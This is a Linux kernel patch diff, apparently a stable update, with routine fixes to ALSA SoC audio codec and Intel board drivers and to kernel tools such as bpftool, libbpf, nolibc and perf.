+diff --git a/sound/soc/codecs/da7219-aad.c b/sound/soc/codecs/da7219-aad.c
+index c8410769188a0..d613f1074524a 100644
+--- a/sound/soc/codecs/da7219-aad.c
++++ b/sound/soc/codecs/da7219-aad.c
+@@ -638,8 +638,10 @@ static struct da7219_aad_pdata *da7219_aad_fw_to_pdata(struct device *dev)
+ 		return NULL;
+ 
+ 	aad_pdata = devm_kzalloc(dev, sizeof(*aad_pdata), GFP_KERNEL);
+-	if (!aad_pdata)
++	if (!aad_pdata) {
++		fwnode_handle_put(aad_np);
+ 		return NULL;
++	}
+ 
+ 	aad_pdata->irq = i2c->irq;
+ 
+@@ -714,6 +716,8 @@ static struct da7219_aad_pdata *da7219_aad_fw_to_pdata(struct device *dev)
+ 	else
+ 		aad_pdata->adc_1bit_rpt = DA7219_AAD_ADC_1BIT_RPT_1;
+ 
++	fwnode_handle_put(aad_np);
++
+ 	return aad_pdata;
+ }
+ 
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index aac9140749968..0bb70066111b7 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -441,6 +441,7 @@ struct rt5645_priv {
+ 	struct regmap *regmap;
+ 	struct i2c_client *i2c;
+ 	struct gpio_desc *gpiod_hp_det;
++	struct gpio_desc *gpiod_cbj_sleeve;
+ 	struct snd_soc_jack *hp_jack;
+ 	struct snd_soc_jack *mic_jack;
+ 	struct snd_soc_jack *btn_jack;
+@@ -3179,6 +3180,9 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 		regmap_update_bits(rt5645->regmap, RT5645_IN1_CTRL2,
+ 			RT5645_CBJ_MN_JD, 0);
+ 
++		if (rt5645->gpiod_cbj_sleeve)
++			gpiod_set_value(rt5645->gpiod_cbj_sleeve, 1);
++
+ 		msleep(600);
+ 		regmap_read(rt5645->regmap, RT5645_IN1_CTRL3, &val);
+ 		val &= 0x7;
+@@ -3195,6 +3199,8 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 			snd_soc_dapm_disable_pin(dapm, "Mic Det Power");
+ 			snd_soc_dapm_sync(dapm);
+ 			rt5645->jack_type = SND_JACK_HEADPHONE;
++			if (rt5645->gpiod_cbj_sleeve)
++				gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
+ 		}
+ 		if (rt5645->pdata.level_trigger_irq)
+ 			regmap_update_bits(rt5645->regmap, RT5645_IRQ_CTRL2,
+@@ -3220,6 +3226,9 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 		if (rt5645->pdata.level_trigger_irq)
+ 			regmap_update_bits(rt5645->regmap, RT5645_IRQ_CTRL2,
+ 				RT5645_JD_1_1_MASK, RT5645_JD_1_1_INV);
++
++		if (rt5645->gpiod_cbj_sleeve)
++			gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
+ 	}
+ 
+ 	return rt5645->jack_type;
+@@ -3931,6 +3940,16 @@ static int rt5645_i2c_probe(struct i2c_client *i2c)
+ 			return ret;
+ 	}
+ 
++	rt5645->gpiod_cbj_sleeve = devm_gpiod_get_optional(&i2c->dev, "cbj-sleeve",
++							   GPIOD_OUT_LOW);
++
++	if (IS_ERR(rt5645->gpiod_cbj_sleeve)) {
++		ret = PTR_ERR(rt5645->gpiod_cbj_sleeve);
++		dev_info(&i2c->dev, "failed to initialize gpiod, ret=%d\n", ret);
++		if (ret != -ENOENT)
++			return ret;
++	}
++
+ 	for (i = 0; i < ARRAY_SIZE(rt5645->supplies); i++)
+ 		rt5645->supplies[i].supply = rt5645_supply_names[i];
+ 
+@@ -4174,6 +4193,9 @@ static void rt5645_i2c_remove(struct i2c_client *i2c)
+ 	cancel_delayed_work_sync(&rt5645->jack_detect_work);
+ 	cancel_delayed_work_sync(&rt5645->rcclock_work);
+ 
++	if (rt5645->gpiod_cbj_sleeve)
++		gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
++
+ 	regulator_bulk_disable(ARRAY_SIZE(rt5645->supplies), rt5645->supplies);
+ }
+ 
+@@ -4189,6 +4211,9 @@ static void rt5645_i2c_shutdown(struct i2c_client *i2c)
+ 		0);
+ 	msleep(20);
+ 	regmap_write(rt5645->regmap, RT5645_RESET, 0);
++
++	if (rt5645->gpiod_cbj_sleeve)
++		gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
+ }
+ 
+ static struct i2c_driver rt5645_i2c_driver = {
+diff --git a/sound/soc/codecs/rt715-sdca.c b/sound/soc/codecs/rt715-sdca.c
+index ce8bbc76199a8..3377846a87539 100644
+--- a/sound/soc/codecs/rt715-sdca.c
++++ b/sound/soc/codecs/rt715-sdca.c
+@@ -315,7 +315,7 @@ static int rt715_sdca_set_amp_gain_8ch_get(struct snd_kcontrol *kcontrol,
+ 	return 0;
+ }
+ 
+-static const DECLARE_TLV_DB_SCALE(in_vol_tlv, -17625, 375, 0);
++static const DECLARE_TLV_DB_SCALE(in_vol_tlv, -1725, 75, 0);
+ static const DECLARE_TLV_DB_SCALE(mic_vol_tlv, 0, 1000, 0);
+ 
+ static int rt715_sdca_get_volsw(struct snd_kcontrol *kcontrol,
+@@ -476,7 +476,7 @@ static const struct snd_kcontrol_new rt715_sdca_snd_controls[] = {
+ 			RT715_SDCA_FU_VOL_CTRL, CH_01),
+ 		SDW_SDCA_CTL(FUN_MIC_ARRAY, RT715_SDCA_FU_ADC7_27_VOL,
+ 			RT715_SDCA_FU_VOL_CTRL, CH_02),
+-			0x2f, 0x7f, 0,
++			0x2f, 0x3f, 0,
+ 		rt715_sdca_set_amp_gain_get, rt715_sdca_set_amp_gain_put,
+ 		in_vol_tlv),
+ 	RT715_SDCA_EXT_TLV("FU02 Capture Volume",
+@@ -484,13 +484,13 @@ static const struct snd_kcontrol_new rt715_sdca_snd_controls[] = {
+ 			RT715_SDCA_FU_VOL_CTRL, CH_01),
+ 		rt715_sdca_set_amp_gain_4ch_get,
+ 		rt715_sdca_set_amp_gain_4ch_put,
+-		in_vol_tlv, 4, 0x7f),
++		in_vol_tlv, 4, 0x3f),
+ 	RT715_SDCA_EXT_TLV("FU06 Capture Volume",
+ 		SDW_SDCA_CTL(FUN_MIC_ARRAY, RT715_SDCA_FU_ADC10_11_VOL,
+ 			RT715_SDCA_FU_VOL_CTRL, CH_01),
+ 		rt715_sdca_set_amp_gain_4ch_get,
+ 		rt715_sdca_set_amp_gain_4ch_put,
+-		in_vol_tlv, 4, 0x7f),
++		in_vol_tlv, 4, 0x3f),
+ 	/* MIC Boost Control */
+ 	RT715_SDCA_BOOST_EXT_TLV("FU0E Boost",
+ 		SDW_SDCA_CTL(FUN_MIC_ARRAY, RT715_SDCA_FU_DMIC_GAIN_EN,
+diff --git a/sound/soc/codecs/rt715-sdw.c b/sound/soc/codecs/rt715-sdw.c
+index 4e61e16470eda..4e35b67b01ce8 100644
+--- a/sound/soc/codecs/rt715-sdw.c
++++ b/sound/soc/codecs/rt715-sdw.c
+@@ -111,6 +111,7 @@ static bool rt715_readable_register(struct device *dev, unsigned int reg)
+ 	case 0x839d:
+ 	case 0x83a7:
+ 	case 0x83a9:
++	case 0x752001:
+ 	case 0x752039:
+ 		return true;
+ 	default:
+diff --git a/sound/soc/codecs/tas2552.c b/sound/soc/codecs/tas2552.c
+index 59a4ea5f6e305..7923f9a031ed0 100644
+--- a/sound/soc/codecs/tas2552.c
++++ b/sound/soc/codecs/tas2552.c
+@@ -2,7 +2,8 @@
+ /*
+  * tas2552.c - ALSA SoC Texas Instruments TAS2552 Mono Audio Amplifier
+  *
+- * Copyright (C) 2014 Texas Instruments Incorporated -  https://www.ti.com
++ * Copyright (C) 2014 - 2024 Texas Instruments Incorporated -
++ *	https://www.ti.com
+  *
+  * Author: Dan Murphy <dmurphy@ti.com>
+  */
+@@ -119,12 +120,14 @@ static const struct snd_soc_dapm_widget tas2552_dapm_widgets[] =
+ 			 &tas2552_input_mux_control),
+ 
+ 	SND_SOC_DAPM_AIF_IN("DAC IN", "DAC Playback", 0, SND_SOC_NOPM, 0, 0),
++	SND_SOC_DAPM_AIF_OUT("ASI OUT", "DAC Capture", 0, SND_SOC_NOPM, 0, 0),
+ 	SND_SOC_DAPM_DAC("DAC", NULL, SND_SOC_NOPM, 0, 0),
+ 	SND_SOC_DAPM_OUT_DRV("ClassD", TAS2552_CFG_2, 7, 0, NULL, 0),
+ 	SND_SOC_DAPM_SUPPLY("PLL", TAS2552_CFG_2, 3, 0, NULL, 0),
+ 	SND_SOC_DAPM_POST("Post Event", tas2552_post_event),
+ 
+-	SND_SOC_DAPM_OUTPUT("OUT")
++	SND_SOC_DAPM_OUTPUT("OUT"),
++	SND_SOC_DAPM_INPUT("DMIC")
+ };
+ 
+ static const struct snd_soc_dapm_route tas2552_audio_map[] = {
+@@ -134,6 +137,7 @@ static const struct snd_soc_dapm_route tas2552_audio_map[] = {
+ 	{"ClassD", NULL, "Input selection"},
+ 	{"OUT", NULL, "ClassD"},
+ 	{"ClassD", NULL, "PLL"},
++	{"ASI OUT", NULL, "DMIC"}
+ };
+ 
+ #ifdef CONFIG_PM
+@@ -538,6 +542,13 @@ static struct snd_soc_dai_driver tas2552_dai[] = {
+ 			.rates = SNDRV_PCM_RATE_8000_192000,
+ 			.formats = TAS2552_FORMATS,
+ 		},
++		.capture = {
++			.stream_name = "Capture",
++			.channels_min = 2,
++			.channels_max = 2,
++			.rates = SNDRV_PCM_RATE_8000_192000,
++			.formats = TAS2552_FORMATS,
++		},
+ 		.ops = &tas2552_speaker_dai_ops,
+ 	},
+ };
+diff --git a/sound/soc/intel/avs/boards/ssm4567.c b/sound/soc/intel/avs/boards/ssm4567.c
+index 51a8867326b47..c1c936b73475d 100644
+--- a/sound/soc/intel/avs/boards/ssm4567.c
++++ b/sound/soc/intel/avs/boards/ssm4567.c
+@@ -217,7 +217,6 @@ static int avs_ssm4567_probe(struct platform_device *pdev)
+ 	card->dapm_routes = routes;
+ 	card->num_dapm_routes = num_routes;
+ 	card->fully_routed = true;
+-	card->disable_route_checks = true;
+ 
+ 	ret = snd_soc_fixup_dai_links_platform_name(card, pname);
+ 	if (ret)
+diff --git a/sound/soc/intel/avs/cldma.c b/sound/soc/intel/avs/cldma.c
+index d7a9390b5e483..585579840b646 100644
+--- a/sound/soc/intel/avs/cldma.c
++++ b/sound/soc/intel/avs/cldma.c
+@@ -35,7 +35,7 @@ struct hda_cldma {
+ 
+ 	unsigned int buffer_size;
+ 	unsigned int num_periods;
+-	unsigned int stream_tag;
++	unsigned char stream_tag;
+ 	void __iomem *sd_addr;
+ 
+ 	struct snd_dma_buffer dmab_data;
+diff --git a/sound/soc/intel/avs/path.c b/sound/soc/intel/avs/path.c
+index ce157a8d65520..989a7a4127cdd 100644
+--- a/sound/soc/intel/avs/path.c
++++ b/sound/soc/intel/avs/path.c
+@@ -308,6 +308,7 @@ static int avs_asrc_create(struct avs_dev *adev, struct avs_path_module *mod)
+ 	struct avs_tplg_module *t = mod->template;
+ 	struct avs_asrc_cfg cfg;
+ 
++	memset(&cfg, 0, sizeof(cfg));
+ 	cfg.base.cpc = t->cfg_base->cpc;
+ 	cfg.base.ibs = t->cfg_base->ibs;
+ 	cfg.base.obs = t->cfg_base->obs;
+diff --git a/sound/soc/intel/boards/bxt_da7219_max98357a.c b/sound/soc/intel/boards/bxt_da7219_max98357a.c
+index 7c6c95e99ade2..420c8b2588c17 100644
+--- a/sound/soc/intel/boards/bxt_da7219_max98357a.c
++++ b/sound/soc/intel/boards/bxt_da7219_max98357a.c
+@@ -762,6 +762,7 @@ static struct snd_soc_card broxton_audio_card = {
+ 	.dapm_routes = audio_map,
+ 	.num_dapm_routes = ARRAY_SIZE(audio_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = bxt_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/bxt_rt298.c b/sound/soc/intel/boards/bxt_rt298.c
+index 4bd93c3ba3777..ea45baaaaaed9 100644
+--- a/sound/soc/intel/boards/bxt_rt298.c
++++ b/sound/soc/intel/boards/bxt_rt298.c
+@@ -574,6 +574,7 @@ static struct snd_soc_card broxton_rt298 = {
+ 	.dapm_routes = broxton_rt298_map,
+ 	.num_dapm_routes = ARRAY_SIZE(broxton_rt298_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = bxt_card_late_probe,
+ 
+ };
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 094445036c20f..d6ef8e850412b 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -636,28 +636,30 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_USE_AMCR0F28),
+ 	},
+ 	{
++		/* Asus T100TAF, unlike other T100TA* models this one has a mono speaker */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100TA"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100TAF"),
+ 		},
+ 		.driver_data = (void *)(BYT_RT5640_IN1_MAP |
+ 					BYT_RT5640_JD_SRC_JD2_IN4N |
+ 					BYT_RT5640_OVCD_TH_2000UA |
+ 					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_MONO_SPEAKER |
++					BYT_RT5640_DIFF_MIC |
++					BYT_RT5640_SSP0_AIF2 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
+ 	{
++		/* Asus T100TA and T100TAM, must come after T100TAF (mono spk) match */
+ 		.matches = {
+-			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100TAF"),
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "T100TA"),
+ 		},
+ 		.driver_data = (void *)(BYT_RT5640_IN1_MAP |
+ 					BYT_RT5640_JD_SRC_JD2_IN4N |
+ 					BYT_RT5640_OVCD_TH_2000UA |
+ 					BYT_RT5640_OVCD_SF_0P75 |
+-					BYT_RT5640_MONO_SPEAKER |
+-					BYT_RT5640_DIFF_MIC |
+-					BYT_RT5640_SSP0_AIF2 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
+ 	{
+diff --git a/sound/soc/intel/boards/glk_rt5682_max98357a.c b/sound/soc/intel/boards/glk_rt5682_max98357a.c
+index cf0f89db3e204..0f9bbb970b230 100644
+--- a/sound/soc/intel/boards/glk_rt5682_max98357a.c
++++ b/sound/soc/intel/boards/glk_rt5682_max98357a.c
+@@ -649,6 +649,8 @@ static int geminilake_audio_probe(struct platform_device *pdev)
+ 	card = &glk_audio_card_rt5682_m98357a;
+ 	card->dev = &pdev->dev;
+ 	snd_soc_card_set_drvdata(card, ctx);
++	if (!snd_soc_acpi_sof_parent(&pdev->dev))
++		card->disable_route_checks = true;
+ 
+ 	/* override platform name, if required */
+ 	mach = pdev->dev.platform_data;
+diff --git a/sound/soc/intel/boards/kbl_da7219_max98357a.c b/sound/soc/intel/boards/kbl_da7219_max98357a.c
+index 329457e3e3a22..c990baed8013b 100644
+--- a/sound/soc/intel/boards/kbl_da7219_max98357a.c
++++ b/sound/soc/intel/boards/kbl_da7219_max98357a.c
+@@ -633,6 +633,7 @@ static struct snd_soc_card kabylake_audio_card_da7219_m98357a = {
+ 	.dapm_routes = kabylake_map,
+ 	.num_dapm_routes = ARRAY_SIZE(kabylake_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_da7219_max98927.c b/sound/soc/intel/boards/kbl_da7219_max98927.c
+index 362579f25835e..7ab80ba264cb5 100644
+--- a/sound/soc/intel/boards/kbl_da7219_max98927.c
++++ b/sound/soc/intel/boards/kbl_da7219_max98927.c
+@@ -1030,6 +1030,7 @@ static struct snd_soc_card kbl_audio_card_da7219_m98927 = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -1048,6 +1049,7 @@ static struct snd_soc_card kbl_audio_card_max98927 = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -1065,6 +1067,7 @@ static struct snd_soc_card kbl_audio_card_da7219_m98373 = {
+ 	.codec_conf = max98373_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98373_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -1082,6 +1085,7 @@ static struct snd_soc_card kbl_audio_card_max98373 = {
+ 	.codec_conf = max98373_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98373_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_rt5660.c b/sound/soc/intel/boards/kbl_rt5660.c
+index 2c7a547f63c90..358d606228121 100644
+--- a/sound/soc/intel/boards/kbl_rt5660.c
++++ b/sound/soc/intel/boards/kbl_rt5660.c
+@@ -518,6 +518,7 @@ static struct snd_soc_card kabylake_audio_card_rt5660 = {
+ 	.dapm_routes = kabylake_rt5660_map,
+ 	.num_dapm_routes = ARRAY_SIZE(kabylake_rt5660_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_rt5663_max98927.c b/sound/soc/intel/boards/kbl_rt5663_max98927.c
+index 2d4224c5b1520..d110ebd10bca2 100644
+--- a/sound/soc/intel/boards/kbl_rt5663_max98927.c
++++ b/sound/soc/intel/boards/kbl_rt5663_max98927.c
+@@ -966,6 +966,7 @@ static struct snd_soc_card kabylake_audio_card_rt5663_m98927 = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -982,6 +983,7 @@ static struct snd_soc_card kabylake_audio_card_rt5663 = {
+ 	.dapm_routes = kabylake_5663_map,
+ 	.num_dapm_routes = ARRAY_SIZE(kabylake_5663_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c b/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c
+index 2c79fca57b19e..a15d2c30b6c46 100644
+--- a/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c
++++ b/sound/soc/intel/boards/kbl_rt5663_rt5514_max98927.c
+@@ -791,6 +791,7 @@ static struct snd_soc_card kabylake_audio_card = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/skl_hda_dsp_generic.c b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+index 463ffb85121d3..2e1c1e4013c3f 100644
+--- a/sound/soc/intel/boards/skl_hda_dsp_generic.c
++++ b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+@@ -231,6 +231,8 @@ static int skl_hda_audio_probe(struct platform_device *pdev)
+ 	ctx->common_hdmi_codec_drv = mach->mach_params.common_hdmi_codec_drv;
+ 
+ 	hda_soc_card.dev = &pdev->dev;
++	if (!snd_soc_acpi_sof_parent(&pdev->dev))
++		hda_soc_card.disable_route_checks = true;
+ 
+ 	if (mach->mach_params.dmic_num > 0) {
+ 		snprintf(hda_soc_components, sizeof(hda_soc_components),
+diff --git a/sound/soc/intel/boards/skl_nau88l25_max98357a.c b/sound/soc/intel/boards/skl_nau88l25_max98357a.c
+index 8dceb0b025812..8180afb4505bc 100644
+--- a/sound/soc/intel/boards/skl_nau88l25_max98357a.c
++++ b/sound/soc/intel/boards/skl_nau88l25_max98357a.c
+@@ -654,6 +654,7 @@ static struct snd_soc_card skylake_audio_card = {
+ 	.dapm_routes = skylake_map,
+ 	.num_dapm_routes = ARRAY_SIZE(skylake_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = skylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/skl_rt286.c b/sound/soc/intel/boards/skl_rt286.c
+index 4f3d655e2bfa8..0a4795a94a768 100644
+--- a/sound/soc/intel/boards/skl_rt286.c
++++ b/sound/soc/intel/boards/skl_rt286.c
+@@ -523,6 +523,7 @@ static struct snd_soc_card skylake_rt286 = {
+ 	.dapm_routes = skylake_rt286_map,
+ 	.num_dapm_routes = ARRAY_SIZE(skylake_rt286_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = skylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/kirkwood/kirkwood-dma.c b/sound/soc/kirkwood/kirkwood-dma.c
+index 640cebd2983e2..16d2c9acc33a6 100644
+--- a/sound/soc/kirkwood/kirkwood-dma.c
++++ b/sound/soc/kirkwood/kirkwood-dma.c
+@@ -182,6 +182,9 @@ static int kirkwood_dma_hw_params(struct snd_soc_component *component,
+ 	const struct mbus_dram_target_info *dram = mv_mbus_dram_info();
+ 	unsigned long addr = substream->runtime->dma_addr;
+ 
++	if (!dram)
++		return 0;
++
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+ 		kirkwood_dma_conf_mbus_windows(priv->io,
+ 			KIRKWOOD_PLAYBACK_WIN, addr, dram);
+diff --git a/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c b/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c
+index f3bebed2428a7..360259e60de84 100644
+--- a/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c
++++ b/sound/soc/mediatek/mt8192/mt8192-dai-tdm.c
+@@ -566,10 +566,10 @@ static int mtk_dai_tdm_hw_params(struct snd_pcm_substream *substream,
+ 		tdm_con |= 1 << DELAY_DATA_SFT;
+ 		tdm_con |= get_tdm_lrck_width(format) << LRCK_TDM_WIDTH_SFT;
+ 	} else if (tdm_priv->tdm_out_mode == TDM_OUT_DSP_A) {
+-		tdm_con |= 0 << DELAY_DATA_SFT;
++		tdm_con |= 1 << DELAY_DATA_SFT;
+ 		tdm_con |= 0 << LRCK_TDM_WIDTH_SFT;
+ 	} else if (tdm_priv->tdm_out_mode == TDM_OUT_DSP_B) {
+-		tdm_con |= 1 << DELAY_DATA_SFT;
++		tdm_con |= 0 << DELAY_DATA_SFT;
+ 		tdm_con |= 0 << LRCK_TDM_WIDTH_SFT;
+ 	}
+ 
+diff --git a/tools/arch/x86/lib/x86-opcode-map.txt b/tools/arch/x86/lib/x86-opcode-map.txt
+index d12d1358f96d2..8eaf140172c58 100644
+--- a/tools/arch/x86/lib/x86-opcode-map.txt
++++ b/tools/arch/x86/lib/x86-opcode-map.txt
+@@ -148,7 +148,7 @@ AVXcode:
+ 65: SEG=GS (Prefix)
+ 66: Operand-Size (Prefix)
+ 67: Address-Size (Prefix)
+-68: PUSH Iz (d64)
++68: PUSH Iz
+ 69: IMUL Gv,Ev,Iz
+ 6a: PUSH Ib (d64)
+ 6b: IMUL Gv,Ev,Ib
+@@ -698,10 +698,10 @@ AVXcode: 2
+ 4d: vrcp14ss/d Vsd,Hpd,Wsd (66),(ev)
+ 4e: vrsqrt14ps/d Vpd,Wpd (66),(ev)
+ 4f: vrsqrt14ss/d Vsd,Hsd,Wsd (66),(ev)
+-50: vpdpbusd Vx,Hx,Wx (66),(ev)
+-51: vpdpbusds Vx,Hx,Wx (66),(ev)
+-52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66),(ev) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
+-53: vpdpwssds Vx,Hx,Wx (66),(ev) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
++50: vpdpbusd Vx,Hx,Wx (66)
++51: vpdpbusds Vx,Hx,Wx (66)
++52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
++53: vpdpwssds Vx,Hx,Wx (66) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
+ 54: vpopcntb/w Vx,Wx (66),(ev)
+ 55: vpopcntd/q Vx,Wx (66),(ev)
+ 58: vpbroadcastd Vx,Wx (66),(v)
+diff --git a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+index 26004f0c5a6ae..7bdbcac3cf628 100644
+--- a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
++++ b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+@@ -102,8 +102,8 @@ int iter(struct bpf_iter__task_file *ctx)
+ 				       BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 		struct bpf_link *link = (struct bpf_link *) file->private_data;
+ 
+-		if (link->type == bpf_core_enum_value(enum bpf_link_type___local,
+-						      BPF_LINK_TYPE_PERF_EVENT___local)) {
++		if (BPF_CORE_READ(link, type) == bpf_core_enum_value(enum bpf_link_type___local,
++								     BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 			e.has_bpf_cookie = true;
+ 			e.bpf_cookie = get_bpf_cookie(link);
+ 		}
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index ef0764d6891e4..82bffa7cf8659 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -728,7 +728,7 @@ static int sets_patch(struct object *obj)
+ 
+ static int symbols_patch(struct object *obj)
+ {
+-	int err;
++	off_t err;
+ 
+ 	if (__symbols_patch(obj, &obj->structs)  ||
+ 	    __symbols_patch(obj, &obj->unions)   ||
+diff --git a/tools/include/nolibc/stdlib.h b/tools/include/nolibc/stdlib.h
+index a24000d1e8222..c0c3854b3f35b 100644
+--- a/tools/include/nolibc/stdlib.h
++++ b/tools/include/nolibc/stdlib.h
+@@ -166,7 +166,7 @@ void *realloc(void *old_ptr, size_t new_size)
+ 	if (__builtin_expect(!ret, 0))
+ 		return NULL;
+ 
+-	memcpy(ret, heap->user_p, heap->len);
++	memcpy(ret, heap->user_p, user_p_len);
+ 	munmap(heap, heap->len);
+ 	return ret;
+ }
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index d5d2183730b9f..a17688011440e 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -6730,7 +6730,7 @@ struct bpf_fib_lookup {
+ 
+ 		/* output: MTU value */
+ 		__u16	mtu_result;
+-	};
++	} __attribute__((packed, aligned(2)));
+ 	/* input: L3 device index for lookup
+ 	 * output: device index from FIB lookup
+ 	 */
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index c71d4d0f5c6f3..bb27dfd6b97a7 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -10417,7 +10417,7 @@ static int attach_kprobe_multi(const struct bpf_program *prog, long cookie, stru
+ 
+ 	n = sscanf(spec, "%m[a-zA-Z0-9_.*?]", &pattern);
+ 	if (n < 1) {
+-		pr_warn("kprobe multi pattern is invalid: %s\n", pattern);
++		pr_warn("kprobe multi pattern is invalid: %s\n", spec);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/tools/lib/subcmd/parse-options.c b/tools/lib/subcmd/parse-options.c
+index 9fa75943f2ed1..d943d78b787ed 100644
+--- a/tools/lib/subcmd/parse-options.c
++++ b/tools/lib/subcmd/parse-options.c
+@@ -633,11 +633,10 @@ int parse_options_subcommand(int argc, const char **argv, const struct option *o
+ 			const char *const subcommands[], const char *usagestr[], int flags)
+ {
+ 	struct parse_opt_ctx_t ctx;
++	char *buf = NULL;
+ 
+ 	/* build usage string if it's not provided */
+ 	if (subcommands && !usagestr[0]) {
+-		char *buf = NULL;
+-
+ 		astrcatf(&buf, "%s %s [<options>] {", subcmd_config.exec_name, argv[0]);
+ 
+ 		for (int i = 0; subcommands[i]; i++) {
+@@ -679,7 +678,10 @@ int parse_options_subcommand(int argc, const char **argv, const struct option *o
+ 			astrcatf(&error_buf, "unknown switch `%c'", *ctx.opt);
+ 		usage_with_options(usagestr, options);
+ 	}
+-
++	if (buf) {
++		usagestr[0] = NULL;
++		free(buf);
++	}
+ 	return parse_options_end(&ctx);
+ }
+ 
+diff --git a/tools/perf/Documentation/perf-list.txt b/tools/perf/Documentation/perf-list.txt
+index 57384a97c04f4..3dae696b748a6 100644
+--- a/tools/perf/Documentation/perf-list.txt
++++ b/tools/perf/Documentation/perf-list.txt
+@@ -63,6 +63,7 @@ counted. The following modifiers exist:
+  D - pin the event to the PMU
+  W - group is weak and will fallback to non-group if not schedulable,
+  e - group or event are exclusive and do not share the PMU
++ b - use BPF aggregration (see perf stat --bpf-counters)
+ 
